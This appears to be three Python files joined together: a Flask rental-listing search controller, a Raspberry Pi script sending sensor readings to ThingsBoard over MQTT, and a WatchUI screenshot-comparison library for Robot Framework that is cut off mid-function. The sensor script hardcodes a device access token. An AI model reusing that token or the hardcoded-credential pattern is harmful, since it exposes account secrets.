import *\nfrom app.irsystem.models.helpers import *\nfrom app.irsystem.models.helpers import NumpyEncoder as NumpyEncoder\nfrom datetime import datetime\nfrom datetime import date\nfrom PyDictionary import PyDictionary\nimport string\nimport pandas as pd\nproject_name = \"Best Food Finder\"\nnet_id = \"April Ye yy459, Alan Huang ah2294, Geena Lee jl3257, Samuel Chen sc2992, Jack Ding jad493\"\nfeatures = ['name','description', 'neighbourhood_cleansed', 'bathrooms','bedrooms','price','maximum_nights', 'amenities', 'picture_url', 'listing_url', 'scores','comments','amenities_match']\n#            0      1              2                         3           4          5       6                 7            8              9              10        11         12\nfrom nltk.stem import PorterStemmer\nfrom nltk.sentiment import SentimentIntensityAnalyzer\nimport pickle\n\n# import sentiment analysis and stemming\n#sia = SentimentIntensityAnalyzer()\nps = PorterStemmer()\n\nloaded_model = pickle.load(open('app/irsystem/controllers/knnpickle_file', 'rb'))\nresult = loaded_model.predict([[1,1,2000,1125]])\n#print(sia.polarity_scores('i like this place'))\n\ndef similarity_result(data, keyword):\n\t'''\n\t@data : dataframe with pruned data\n\t@keyword : list of tokens in the keyword query\n\t'''\n\tkeyword = [w.lstrip() for w in keyword]\n\tkeywordsWithSynonyms = []\n\tdictionary = PyDictionary(keyword)\n\tfor i, w in enumerate(keyword):\n\t\tsynonyms = dictionary.getSynonyms()[i]\n\t\tkeywordsWithSynonyms.append(w)\n\t\tif synonyms is not None:\n\t\t\tkeywordsWithSynonyms += synonyms[w]\n\tkeywordsWithSynonyms = [ps.stem(w) for w in keywordsWithSynonyms]\n\treviews = getreview()\n\trank = []\n\tfor i, text in enumerate(data['description']):\n\t\t#perform jaccard\n\t\tscores = 0\n\t\t# remove punctuation\n\t\ttokens = text.strip(string.punctuation)\n\t\ttokens = tokens.lower().split()\n\t\t# stem the token\n\t\ttokens = [ps.stem(w) for w in tokens]\n\n\t\tintersection = len(list(set(tokens).intersection(set(keywordsWithSynonyms))))\n\t\tunion = (len(tokens) + len(keywordsWithSynonyms)) - intersection\n\t\t# guard against an empty union to avoid division by zero\n\t\tif union == 0:\n\t\t\tprint(\"union is 0\")\n\t\telse:\n\t\t\tscores += float(intersection) / union\n\n\t\tlist_id = data.iloc[i]['id']\n\n\t\t#jaccard on amenities\n\t\tamenities = data.iloc[i]['amenities']\n\t\tamenities = [ps.stem(w.lower()) for w in amenities]\n\t\tintersection = len(list(set(amenities).intersection(set(keywordsWithSynonyms))))\n\t\tunion = (len(amenities) + len(keywordsWithSynonyms)) - intersection\n\t\tif union > 0:\n\t\t\tscores += float(intersection) / union\n\n\t\t# compute the similarity score for the reviews as well\n\t\tfor rev in reviews[reviews.listing_id == list_id]['comments']:\n\t\t\ttokens = rev.strip(string.punctuation)\n\t\t\ttokens = tokens.lower().split()\n\t\t\ttokens = [ps.stem(w) for w in tokens]\n\t\t\tintersection = len(list(set(tokens).intersection(set(keywordsWithSynonyms))))\n\t\t\tunion = (len(tokens) + len(keywordsWithSynonyms)) - intersection\n\t\t\tif union > 0:\n\t\t\t\tscores += float(intersection) / union\n\n\t\trank.append((scores, i))\n\trank = sorted(rank, key=lambda tup: tup[0], reverse=True)\n\t# get the sorted index\n\tranked_i = [doc[1] for doc in rank]\n\tscores = [doc[0] for doc in rank]\n\treturn data.iloc[ranked_i], scores\n\ndef getReviews(data):\n\ttotal_review = []\n\tfor i in range(len(data)):\n\t\treviews = getreview()\n\t\tlist_comment = []\n\t\tid = data.iloc[i]['id']\n\t\tfor rev in reviews[reviews.listing_id == id]['comments']:\n\t\t\tlist_comment.append(rev)\n\n\t\ttotal_review.append(list_comment)\n\tdata['comments'] = total_review\n\treturn data\n\ndef getAmen(data, query):\n\tquery = [w.lstrip() for w in query]\n\tlists = []\n\tfor i in 
range(len(data)):\n\t\tlist_amen = []\n\t\tfor amen in data.iloc[i]['amenities']:\n\t\t\tif(amen.lower() in query):\n\t\t\t\tlist_amen.append(amen)\n\t\tlists.append(list_amen)\n\n\tdata['amenities_match'] = lists\n\treturn data\n\n\n@irsystem.route('/search', methods=['GET'])\ndef search():\n\tprint(\"in search\")\n\tdf = getdata()\n\n\t#Todo: so far i am not sure how the query will be passed in and how many will be passed so i just put some dummy value\n\n\tquery = request.args.get('keywords')\n\n\tif not query:\n\t\tdata = []\n\t\toutput_message = 'No result'\n\t\treturn render_template('no_results.html')\n\n\t\t#return render_template('search.html', name=project_name, netid=net_id, output_message=output_message, data=data)\n\tprint(query)\n\toutput_message = \"Your search: \" + query\n\n\tprice = int(request.args.get('budget'))\n\tnbh = request.args.get('neighborhood')\n\tbedrooms = int(request.args.get('bed'))\n\tbathrooms = int(request.args.get('bath'))\n\tstart_date = datetime.strptime(request.args.get('start_date'), '%Y-%m-%d')\n\tend_date = datetime.strptime(request.args.get('end_date'), '%Y-%m-%d')\n\ttoday_date = datetime.strptime(date.today().strftime('%Y-%m-%d'), '%Y-%m-%d')\n\ttime = (end_date - start_date).days\n\tstart_date_check = (start_date - today_date).days\n\tprint(start_date)\n\tprint('------')\n\tprint(today_date)\n\tif (time < 0 or start_date_check < 0):\n\t\toutput_message = \"The date you inputted was invalid,\"\n\t\tif start_date_check < 0:\n\t\t\toutput_message += \" start date must be after today's date.\"\n\t\telif time < 0:\n\t\t\toutput_message += \" end date must be after start date.\"\n\t\treturn render_template('no_results.html', output_message=output_message)\n\n\t# print(bedrooms)\n\t# print(bathrooms)\n\t# print(time)\n\tprice /= time\n\tknn = False\n\tif not nbh:\n\t\tnbh = loaded_model.predict([[bathrooms,bedrooms,price,time]])[0]\n\t\toutput_message = ''\n\t\tknn = True\n\tpruned_data = df[(df.neighbourhood_cleansed == nbh) & (df.price <= price) & (df.bedrooms >= bedrooms) & (df.bathrooms >= bathrooms) & (df.maximum_nights >= time)]\n\tif (len(pruned_data) == 0):\n\t\tpruned_data = df[(df.neighbourhood_cleansed == nbh) & (df.bedrooms >= bedrooms) & (df.bathrooms >= bathrooms) & (df.maximum_nights >= time)]\n\t\toutput_message = 'No results for your query, but you might like these!'\n\t\tif (len(pruned_data) == 0):\n\t\t\tpruned_data = df[(df.neighbourhood_cleansed == nbh)]\n\t\t\toutput_message = 'No results for your query, but you might like these!'\n\n\tres_list, scores= similarity_result(pruned_data, keyword=query.lower().split(','))\n\tres_list = res_list[:5]\n\tscores = scores[:5]\n\tres_list['scores'] = scores\n\tif len(scores) > 0:\n\t\tres_list['scores'] = res_list['scores'].round(3)\n\n\t#print(res_list)\n\tres_list = getReviews(res_list)\n\t#print(res_list)\n\tprint(res_list['comments'])\n\n\tprint(res_list['scores'])\n\n\n\t# if jaccard is 0\n\tif(len(res_list) != 0 and scores[0] == 0):\n\t\tres_list = res_list.sort_values('price')\n\tres_list = getAmen(res_list, query.lower().split(','))\n\tres_list = res_list[features]\n\n\n\tfor index, amen_list in res_list['amenities'].items():\n\t\tres_list['amenities'][index] = list(set(amen_list).difference(set(res_list['amenities_match'][index])))\n\n\t#res_list['maximum_nights'] = pd.to_numeric(res_list['maximum_nights'], errors='coerce')\n\t#res_list['bedrooms'] = pd.to_numeric(res_list['bedrooms'], errors='coerce')\n\t#res_list['bedrooms'].astype(int)\n\t#res_list['bathrooms'] = 
pd.to_numeric(res_list['bathrooms'], errors='coerce')\n\t#res_list['price'] = pd.to_numeric(res_list['price'], errors='coerce')\n\n\t#print(res_list)\n\n\n # description\n # neighbourhood_cleansed\n # bathrooms\n # bedrooms\n # price\n # maximum_nights\n\tif(len(res_list) == 0):\n\t\toutput_message = 'No results for your query'\n\tif(knn == True):\n\t\toutput_message += ' Recommended neighborhood: ' + nbh\n\treturn render_template('results.html', name=project_name, netid=net_id, output_message=output_message, data=res_list.values.tolist())\n\n@irsystem.route('/', methods=['GET'])\ndef home():\n\tprint(\"in home\")\n\treturn render_template('search.html', name=project_name, netid=net_id)\n","sub_path":"app/irsystem/controllers/search_controller.py","file_name":"search_controller.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"536698231","text":"# Stolen and modified from https://thingsboard.io/docs/samples/raspberry/temperature/\n\nimport os\nimport time\nimport sys\nimport Adafruit_DHT as dht\nimport paho.mqtt.client as mqtt \nimport json\n\nTHINGSBOARD_HOST = 'demo.thingsboard.io'\n\n# Access Token is created/accessed from the 'Devices' section on thingsverse website \nACCESS_TOKEN = 'dDynH8yqU5uumM2KU94A'\n\n# Data capture and upload interval in seconds. Less interval will eventually hang the DHT22.\nINTERVAL=2\n\nsensor1_data = {'temperature1': 0, 'humidity1': 0}\nsensor2_data = {'temperature2': 0, 'humidity2': 0}\n\nnext_reading = time.time() \n\nclient = mqtt.Client()\n\n# Set access token\nclient.username_pw_set(ACCESS_TOKEN)\n\n# Connect to ThingsBoard using default MQTT port and 60 seconds keepalive interval\nclient.connect(THINGSBOARD_HOST, 1883, 60)\n\nclient.loop_start()\n\ntry:\n while True:\n humidity1,temperature1 = dht.read_retry(dht.DHT11, 14) #14 because the sensor is hooked up to GPIO14 \n humidity1 = round(humidity1, 2)\n temperature1 = round(temperature1, 2)\n print(\"Temperature1: %-3.1f C\" % temperature1)\n print(\"Humidity1: %-3.1f %%\" % humidity1)\n sensor1_data['temperature1'] = temperature1\n sensor1_data['humidity1'] = humidity1\n\n #humidity2,temperature2 = dht.read_retry(dht.DHT11, 2) #2 because the sensor is hooked up to GPIO2 \n #humidity2 = round(humidity2, 2)\n #temperature2 = round(temperature2, 2)\n #print(\"Temperature2: %-3.1f C\" % temperature2)\n #print(\"Humidity2: %-3.1f %%\" % humidity2)\n #sensor2_data['temperature2'] = temperature2\n #sensor2_data['humidity2'] = humidity2\n\n # Sending humidity and temperature data to ThingsBoard\n client.publish('v1/devices/me/telemetry', json.dumps(sensor1_data), 1)\n #client.publish('v1/devices/me/telemetry', json.dumps(sensor2_data), 1)\n\n next_reading += INTERVAL\n sleep_time = next_reading-time.time()\n if sleep_time > 0:\n time.sleep(sleep_time)\nexcept KeyboardInterrupt:\n pass\n\nclient.loop_stop()\nclient.disconnect()","sub_path":"RpiTempSense.py","file_name":"RpiTempSense.py","file_ext":"py","file_size_in_byte":2095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"569035492","text":"import csv\nimport os\nimport time\n\nimport cv2 as cv\nimport pandas as pd\nfrom robot.libraries.BuiltIn import BuiltIn, RobotNotRunningError\nfrom skimage.metrics import structural_similarity\n\nimport imutils\n\n\nclass WatchUI:\n \"\"\"WatchUI - Custom library for comparing images with use in Robot Framework.\n\n = Table of Contents =\n\n - `Usage`\n - 
`Importing`\n    - `Examples`\n    - `Keywords`\n\n    = Usage =\n\n    This library allows for automated visual testing of web frontends.\n    Currently, this library is not officially supported, so the best way is to\n    clone the repository and copy the WatchUI.py library file into your project and then\n    import it - see the Importing section.\n\n    However, you can also install it via the command *pip install WatchUI* and then import it.\n\n    *IMPORTANT*: When using keywords of this library, please remember that the compared screenshots have to have the same resolution!\n\n    = Examples =\n    Import library\n    | `Library` | WatchUI.py | outputs_folder=<path> | ssim_basic=<float> |\n\n    Compare Images\n    | Compare Images | path1 | path2 | save_folder=<path> | ssim=<float> |\n\n    \"\"\"\n\n    save_folder_path = \"../Outputs\"\n    starts_ssim = 1.0\n    starts_format_image = \"png\"\n\n    def __init__(self, outputs_folder=save_folder_path, ssim_basic=starts_ssim, format_image=starts_format_image):\n        \"\"\"Library can be imported either with the default output folder and the default lowest accepted limit of difference between images (ssim), or\n        you can provide your own values.\n\n        Keyword Arguments:\n\n        outputs_folder {str} -- path where you want to save images with highlighted differences (default: \"../Outputs\")\n\n        ssim_basic {float} -- threshold value in the interval (0, 1>. Tests pass if the ssim value returned by the keyword test functions is bigger than this (default: 1.0)\n\n        format_image {str} -- Format for saving pictures/screenshots (png, jpg etc.) Example: format_image=jpg (default: png)\n\n        Examples:\n\n        | =Setting= | =Value= | =Value= | =Value= | =Comment= |\n        | Library | WatchUI.py | | | # Uses default values of keyword arguments |\n        | Library | WatchUI.py | outputs_folder=<path> | | # changes the output folder |\n        | Library | WatchUI.py | outputs_folder=<path> | ssim_basic=<float> | # changes output folder and ssim threshold |\n\n        \"\"\"\n        self.outputs_folder = outputs_folder\n        self.ssim_basic = float(ssim_basic)\n        self.image_format = str(format_image)\n        # when libdoc builds documentation, this would lead to an exception, since robot cannot access the execution context\n        # (nothing really executes there)\n        try:\n            self.seleniumlib = BuiltIn().get_library_instance(\"SeleniumLibrary\")\n            self.robotlib = BuiltIn().get_library_instance(\"BuiltIn\")\n        except RobotNotRunningError as e:\n            print(\n                f\"If you are trying to build documentation, then this exception is just a nuisance, skipping...\\n{str(e)}\"\n            )\n            pass\n        self.score = None\n        self.cnts = None\n        self.img1 = None\n        self.img2 = None\n\n    def _check_dir(self, save_folder):\n        \"\"\"Checks if the given folder exists; if not, creates it.\n\n        Arguments:\n            save_folder {str} -- path to the folder for saving outputs\n        \"\"\"\n        if save_folder != self.save_folder_path:\n            if os.path.exists(save_folder):\n                self.save_folder = save_folder\n            else:\n                os.mkdir(save_folder)\n                self.save_folder = save_folder\n        else:\n            if os.path.exists(self.outputs_folder):\n                self.save_folder = self.outputs_folder\n            else:\n                os.mkdir(self.outputs_folder)\n                self.save_folder = self.outputs_folder\n\n    def _check_ssim(self, ssim):\n        \"\"\"Checks if ssim equals the default and stores the ssim value.\n\n        Arguments:\n            ssim {float} -- provided ssim value\n\n        Returns:\n            self.ssim {float} -- ssim value as an instance attribute\n        \"\"\"\n        if ssim == 1.0:\n            self.ssim = float(self.ssim_basic)\n        else:\n            self.ssim = float(ssim)\n\n    def _check_image_format(self, format):\n        \"\"\"Checks which format is set up for saving pictures.\n\n        Arguments:\n            format {str} -- Image format such as png, jpg etc.\n\n        Returns:\n            self.format {str} -- image file extension, e.g. \".png\"\n        \"\"\"\n        if 
str(format) == 'png':\n self.format = '.' + self.image_format\n else:\n self.format = '.' + format\n\n def _compare_images(self, path1, path2):\n \"\"\"Compares two images.\n\n Arguments:\n path1 { str } -- filepath to image 1\n path2 { str } -- filepath to image 2\n \"\"\"\n self.img1 = cv.imread(path1, 1)\n self.img2 = cv.imread(path2, 1)\n\n # convert to grey\n gray_img1 = cv.cvtColor(self.img1, cv.COLOR_BGR2GRAY)\n gray_img2 = cv.cvtColor(self.img2, cv.COLOR_BGR2GRAY)\n\n # SSIM diff Img\n (self.score, diff) = structural_similarity(gray_img1, gray_img2, full=True)\n diff = (diff * 255).astype(\"uint8\")\n\n # Threshold diff Img\n thresh = cv.threshold(diff, 0, 255, cv.THRESH_BINARY_INV | cv.THRESH_OTSU)[1]\n cnts = cv.findContours(thresh.copy(), cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n self.cnts = imutils.grab_contours(cnts)\n\n def compare_images(\n self, path1, path2, save_folder=save_folder_path, ssim=starts_ssim, image_format=starts_format_image\n ):\n \"\"\"Comparing images\n\n It compares two images from the two paths and, if there are differences, saves the image with the errors highlighted\n in the folder: ../Save Image\n\n path1 = path to the first image to be compared\n path2 = path to the second image to be compared\n\n Example: Compare two image ../image1.png ../Image2.png\n \"\"\"\n self._check_dir(save_folder)\n self._check_ssim(ssim)\n self._check_image_format(image_format)\n\n if os.path.exists(path1) and os.path.exists(path2):\n # Compare image\n self._compare_images(path1, path2)\n\n # Create frame in diff area\n for c in self.cnts:\n (x, y, w, h) = cv.boundingRect(c)\n cv.rectangle(self.img1, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cv.rectangle(self.img2, (x, y), (x + w, y + h), (0, 0, 255), 2)\n\n # Show image\n\n if float(self.score) < self.ssim:\n self.robotlib.log_to_console(self.ssim)\n self.robotlib.log_to_console(self.score)\n cv.imwrite(\n self.save_folder + \"/Img\" + str(time.time()) + self.format, self.img2\n )\n self.robotlib.fail(\"*INFO* Save file with difference\")\n else:\n img_diff = cv.hconcat([self.img1, self.img2])\n time_ = str(time.time())\n self.seleniumlib.capture_page_screenshot(\n save_folder + \"/Img\" + time_ + self.format\n )\n cv.imwrite(save_folder + \"/Img\" + time_ + self.format, img_diff)\n self.robotlib.log_to_console(\n \"Image has diff: {} \".format(self.score)\n )\n else:\n raise AssertionError(\"Path doesnt exists\")\n\n def compare_screen(self, path1, save_folder=save_folder_path, ssim=starts_ssim, image_format=starts_format_image):\n \"\"\"\tCompare the already save image with the browser screen\n\n Compares the already saved image with the screen that is on the screen. 
If there is a difference, it saves the\n        highlighted image to the folder: ../Save Image\n\n        path1 = path to the image to be compared to the screen\n\n        Example: Compare screen ../image1.png\n        \"\"\"\n        self._check_dir(save_folder)\n        self._check_ssim(float(ssim))\n        self._check_image_format(image_format)\n        save_folder = self.save_folder\n        self.seleniumlib.capture_page_screenshot(save_folder + \"/testscreen.png\")\n        path2 = save_folder + \"/testscreen.png\"\n        if os.path.exists(path1):\n            if os.path.exists(path2):\n                # Compare image\n                self._compare_images(path1, path2)\n\n                # Create frame in diff area\n                for c in self.cnts:\n                    (x, y, w, h) = cv.boundingRect(c)\n                    cv.rectangle(self.img1, (x, y), (x + w, y + h), (0, 0, 255), 2)\n                    cv.rectangle(self.img2, (x, y), (x + w, y + h), (0, 0, 255), 2)\n                # Show image\n\n                self.robotlib.log_to_console(self.ssim)\n                if float(self.score) < self.ssim:\n                    self.robotlib.log_to_console(self.ssim)\n                    img_diff = cv.hconcat([self.img1, self.img2])\n                    time_ = str(time.time())\n                    score_percen = float(self.score) * 100\n                    self.seleniumlib.capture_page_screenshot(\n                        save_folder + \"/Img\" + time_ + self.format\n                    )\n                    cv.imwrite(save_folder + \"/Img\" + time_ + self.format, img_diff)\n                    self.robotlib.fail(\"Image has diff: {} %\".format(score_percen))\n                else:\n                    img_diff = cv.hconcat([self.img1, self.img2])\n                    time_ = str(time.time())\n                    self.seleniumlib.capture_page_screenshot(\n                        save_folder + \"/Img\" + time_ + self.format\n                    )\n                    cv.imwrite(save_folder + \"/Img\" + time_ + self.format, img_diff)\n                    self.robotlib.log_to_console(\n                        \"Image has diff: {} \".format(self.score)\n                    )\n            else:\n                raise AssertionError(\"Path2 not found: \" + path2)\n        else:\n            raise AssertionError(\"Path1 not found: \" + path1)\n        if os.path.exists(save_folder + \"/testscreen.png\"):\n            os.remove(save_folder + \"/testscreen.png\")\n\n    def create_area(\n        self, x1, y1, x2, y2, save_folder=save_folder_path, screen_name=\"screen\", image_format=starts_format_image\n    ):\n        \"\"\" Creates a cut-out from the screen\n\n        Creates a cut-out from the screen that is on the screen and saves it in the folder: ../Create area\n\n        x1 and y1 = x and y coordinates for the upper left corner of the square\n        x2 and y2 = x and y coordinates for the bottom right corner of the square\n\n        Example: Compare making area 0 0 25 25\n        \"\"\"\n        self._check_dir(save_folder)\n        save_folder = self.save_folder\n        self._check_image_format(image_format)\n\n        self.seleniumlib.capture_page_screenshot(save_folder + '/testscreen.png')\n        img = save_folder + '/testscreen.png'\n        img_crop = cv.imread(img)\n        crop_img = img_crop[\n            int(x1): int(y2), int(y1): int(x2)\n        ] # Crop from {x, y, w, h } => {0, 0, 300, 400}\n        if screen_name == \"screen\":\n            cv.imwrite(save_folder + '/screen' + str(time.time()) + self.format, crop_img)\n        else:\n            cv.imwrite(save_folder + '/' + screen_name + self.format, crop_img)\n\n    def create_screens(\n        self, *resolution, save_folder=save_folder_path, screen_name=\"screen\", image_format=starts_format_image\n    ):\n        \"\"\" Creates a screenshot on the screen\n\n        Creates a screenshot of the page for each specified resolution, so it is possible to create on one\n        page any number of screens with different resolutions.\n        Screens are stored in the folder: ../Create rescreens\n\n        *resolution = The specified resolutions in width and height format; you can enter as many as needed\n\n        Warning: When you create one screen, the name will be screen.png, but when you create more than one screen from the same\n        page, the name will be 
<screen_name><width>x<height>.png (e.g. screen800x600.png)\n\n        Example: compare making rescreens 800 600 1280 800 1440 900 Creates 3 screens in 800x600, 1280x800 and 1440x900\n        \"\"\"\n        self._check_dir(save_folder)\n        save_folder = self.save_folder\n        self._check_image_format(image_format)\n\n        leng_reso = len(resolution)\n        if leng_reso % 2 == 0:\n            if (leng_reso / 2) == 1:\n                self.seleniumlib.set_window_size(int(resolution[0]), int(resolution[1]))\n                time.sleep(1)\n                self.seleniumlib.capture_page_screenshot(\n                    save_folder\n                    + \"/\"\n                    + screen_name\n                    + self.format\n                )\n            else:\n                x = leng_reso / 2\n                i = 0\n                a = 0\n                while i < x:\n                    width = int(resolution[0 + a])\n                    height = int(resolution[1 + a])\n                    self.seleniumlib.set_window_size(width, height)\n                    time.sleep(1)\n                    self.seleniumlib.capture_page_screenshot(\n                        save_folder\n                        + \"/\"\n                        + screen_name\n                        + str(width)\n                        + \"x\"\n                        + str(height)\n                        + self.format\n                    )\n                    a += 2\n                    i += 1\n        else:\n            raise AssertionError(\"Bad number of resolution values: widths and heights must come in pairs\")\n\n    def compare_screen_areas(\n        self, x1, y1, x2, y2, path1, save_folder=save_folder_path, ssim=starts_ssim, image_format=starts_format_image\n    ):\n        \"\"\"Creates a cut-out from the screen\n\n        Creates a cut-out from the screen that is on the screen and compares it to a previously created one\n\n        x1 and y1 = x and y coordinates for the upper left corner of the square\n        x2 and y2 = x and y coordinates for the bottom right corner of the square\n        path1 = Path to an already created viewport with which we want to compare the viewport created by us\n\n        Example: Compare screen area 0 0 25 25 ../Crop_Image1.png Creates Crop_Image1.png from 0, 0, 25, 25\n        \"\"\"\n        self._check_dir(save_folder)\n        self._check_ssim(ssim)\n        self._check_image_format(image_format)\n        save_folder = self.save_folder\n        self.seleniumlib.capture_page_screenshot(save_folder + '/test1.png')\n        path2 = save_folder + '/test1.png'\n\n        if os.path.exists(path1):\n            if os.path.exists(path2):\n                # load img\n                img1 = cv.imread(path1, 1) # img from docu\n                img2 = cv.imread(path2, 1) # img from screenshot\n\n                # convert to grey\n                gray_img1 = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)\n                gray_img2 = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)\n\n                # splitting area\n                crop_img = gray_img2[\n                    int(x1): int(y2), int(y1): int(x2)\n                ] # Crop from {x, y, w, h } => {0, 0, 300, 400}\n\n                # SSIM diff img\n                (self.score, diff) = structural_similarity(\n                    gray_img1, crop_img, full=True\n                )\n                diff = (diff * 255).astype('uint8')\n\n                # Threshold diff img\n                thresh = cv.threshold(\n                    diff, 0, 255, cv.THRESH_BINARY_INV | cv.THRESH_OTSU\n                )[1]\n                cnts = cv.findContours(\n                    thresh.copy(), cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE\n                )\n                cnts = imutils.grab_contours(cnts)\n\n                crop_img_color = img2[int(x1): int(y2), int(y1): int(x2)]\n                # Create frame in diff area\n                for c in cnts:\n                    (x, y, w, h) = cv.boundingRect(c)\n                    cv.rectangle(img1, (x, y), (x + w, y + h), (0, 0, 255), 2)\n                    cv.rectangle(crop_img_color, (x, y), (x + w, y + h), (0, 0, 255), 2)\n\n                # Show image\n                if float(self.score) < self.ssim:\n                    self.robotlib = BuiltIn().get_library_instance('BuiltIn')\n                    img_diff = cv.hconcat([img1, crop_img_color])\n                    time_ = str(time.time())\n                    self.seleniumlib.capture_page_screenshot(\n                        save_folder + '/img' + time_ + '.png'\n                    )\n                    cv.imwrite(save_folder + '/img' + time_ + self.format, img_diff)\n                    score_percen = float(self.score) * 100\n                    self.robotlib.fail('Image has diff: {} %'.format(score_percen))\n                else:\n                    img_diff = cv.hconcat([img1, crop_img_color])\n                    time_ = str(time.time())\n
                    self.seleniumlib.capture_page_screenshot(\n                        save_folder + \"/Img\" + time_ + self.format\n                    )\n                    cv.imwrite(save_folder + \"/Img\" + time_ + self.format, img_diff)\n                    self.robotlib.log_to_console(\n                        \"Image has diff: {} \".format(self.score)\n                    )\n            else:\n                raise AssertionError(\"New screenshot does not exist anymore\")\n        else:\n            raise AssertionError(\"Given path1 does not exist: \" + path1)\n        if os.path.exists(save_folder + '/test1.png'):\n            os.remove(save_folder + '/test1.png')\n\n    def compare_screen_without_areas(\n        self, path1, *args, save_folder=save_folder_path, ssim=starts_ssim, image_format=starts_format_image\n    ):\n        \"\"\"\n        Compares two pictures, which have parts to be ignored\n        x1 and y1 = x and y coordinates for the upper left corner of the ignored area square\n        x2 and y2 = x and y coordinates for the lower right corner of the square of the ignored part\n\n        Attention! It is always necessary to enter the coordinates in the order x1 y1 x2 y2 x1 y1 x2 y2 etc ...\n\n        Compare screen without areas ../Image1.png 0 0 30 40 50 50 100 100\n        Creates 2 ignored parts at 0,0, 30,40 and 50, 50, 100, 100\n        \"\"\"\n        self._check_dir(save_folder)\n        self._check_ssim(ssim)\n        self._check_image_format(image_format)\n        save_folder = self.save_folder\n\n        self.seleniumlib.capture_page_screenshot(save_folder + \"/test1.png\")\n        path2 = save_folder + \"/test1.png\"\n        if os.path.exists(path1) and os.path.exists(path2):\n            lt = len(args)\n            img1 = cv.imread(path1, 1)\n            img2 = cv.imread(path2, 1)\n            if lt % 4 == 0:\n                x = lt / 4\n                self.robotlib.log_to_console(x)\n                i = 0\n                a = 0\n                while i < x:\n                    color = (0, 0, 0)\n                    x1 = int(args[0 + a])\n                    y1 = int(args[1 + a])\n                    x2 = int(args[2 + a])\n                    y2 = int(args[3 + a])\n\n                    cv.rectangle(img1, (x1, y1), (x2, y2), color, -1)\n                    cv.rectangle(img2, (x1, y1), (x2, y2), color, -1)\n                    a += 4\n                    i += 1\n\n                # convert to grey\n                gray_img1 = cv.cvtColor(img1, cv.COLOR_BGR2GRAY)\n                gray_img2 = cv.cvtColor(img2, cv.COLOR_BGR2GRAY)\n\n                # SSIM diff Img\n                (self.score, diff) = structural_similarity(\n                    gray_img1, gray_img2, full=True\n                )\n                diff = (diff * 255).astype(\"uint8\")\n\n                # Threshold diff Img\n                thresh = cv.threshold(\n                    diff, 0, 255, cv.THRESH_BINARY_INV | cv.THRESH_OTSU\n                )[1]\n                cnts = cv.findContours(\n                    thresh.copy(), cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE\n                )\n                cnts = imutils.grab_contours(cnts)\n\n                # Create frame in diff area\n                for c in cnts:\n                    (x, y, w, h) = cv.boundingRect(c)\n                    cv.rectangle(img1, (x, y), (x + w, y + h), (0, 0, 255), 2)\n                    cv.rectangle(img2, (x, y), (x + w, y + h), (0, 0, 255), 2)\n\n                # Show image\n                if float(self.score) < self.ssim:\n                    img_diff = cv.hconcat([img1, img2])\n                    time_ = str(time.time())\n                    self.seleniumlib.capture_page_screenshot(\n                        save_folder + \"/Img\" + time_ + self.format\n                    )\n                    cv.imwrite(save_folder + \"/Img\" + time_ + self.format, img_diff)\n                    self.robotlib.fail(\"Image has diff: {} \".format(self.score))\n                else:\n                    img_diff = cv.hconcat([img1, img2])\n                    time_ = str(time.time())\n                    self.seleniumlib.capture_page_screenshot(\n                        save_folder + \"/Img\" + time_ + self.format\n                    )\n                    cv.imwrite(save_folder + \"/Img\" + time_ + self.format, img_diff)\n                    self.robotlib.log_to_console(\n                        \"Image has diff: {} \".format(self.score)\n                    )\n        else:\n            raise AssertionError(\"Path does not exist\")\n\n    def compare_screen_get_information(\n        self,\n        path1,\n        save_folder=save_folder_path,\n        folder_csv=\"../CSV_ERROR\",\n        ssim=starts_ssim,\n        image_format=starts_format_image\n    ):\n        \"\"\"\tCompare the already saved image with the browser screen\n\n        Compares the already saved image with the 
screen that is on the screen. If there is a difference, it saves the\n highlighted image to the: ../Save Image and making csv file with coordinates and elements which exist on this\n coordinates\n\n path1 = path to the image to be compared to screen\n\n Example: Compare screen ../image1.png\n \"\"\"\n self._check_dir(save_folder)\n self._check_dir(folder_csv)\n self._check_ssim(ssim)\n self._check_image_format(image_format)\n save_folder = self.save_folder\n # Making screen\n self.seleniumlib.capture_page_screenshot(save_folder + \"/test1.png\")\n path2 = save_folder + \"/test1.png\"\n if os.path.exists(path1):\n if os.path.exists(path2):\n # load Img\n self._compare_images(path1, path2)\n\n # write coordinate\n with open(folder_csv + \"/bug_coordinates.csv\", \"w\") as csvfile:\n writer = csv.writer(csvfile)\n a = \"path\", \"x_center\", \"y_center\", \"x\", \"y\", \"x1\", \"y1\"\n writer.writerow(a)\n\n # Create frame in diff area\n for c in self.cnts:\n (x, y, w, h) = cv.boundingRect(c)\n cv.rectangle(self.img1, (x, y), (x + w, y + h), (0, 0, 255), 2)\n cv.rectangle(self.img2, (x, y), (x + w, y + h), (0, 0, 255), 2)\n x2 = x + w\n y2 = y + h\n x_center = x + ((x2 - x) / 2)\n y_center = y + ((y2 - y) / 2)\n f = path1, x_center, y_center, x, y, x2, y2\n writer.writerow(f)\n\n # Save image and show report\n if float(self.score) < self.ssim:\n img_diff = cv.hconcat([self.img1, self.img2])\n time_ = str(time.time())\n self.seleniumlib.capture_page_screenshot(\n save_folder + \"/Img{0}.{1}\".format(time_, self.format)\n )\n cv.imwrite(save_folder + \"/Img{0}.{1}\".format(time_, self.format), img_diff)\n\n # start reading coordinates and saving element from coordinate\n df = pd.read_csv(r\"\" + folder_csv + \"/bug_coordinates.csv\")\n with open(\n folder_csv + \"/bug_co_and_name{0}.csv\".format(str(time.time())),\n \"w\",\n ) as csv_name:\n writer = csv.writer(csv_name)\n a = \"web-page\", \"x_center\", \"y_center\", \"class\", \"id\", \"name\"\n writer.writerow(a)\n\n # Get information from position\n for i in range(len(df)):\n x_center = df.values[i, 1]\n y_center = df.values[i, 2]\n driver = self.seleniumlib.driver\n elements = driver.execute_script(\n \"return document.elementsFromPoint(arguments[0], arguments[1]);\",\n x_center,\n y_center,\n )\n for element in elements:\n e_class = element.get_attribute(\"class\")\n e_id = element.get_attribute(\"id\")\n e_name = element.get_attribute(\"name\")\n f = path1, x_center, y_center, e_class, e_id, e_name\n writer.writerow(f)\n\n score_percen = float(self.score) * 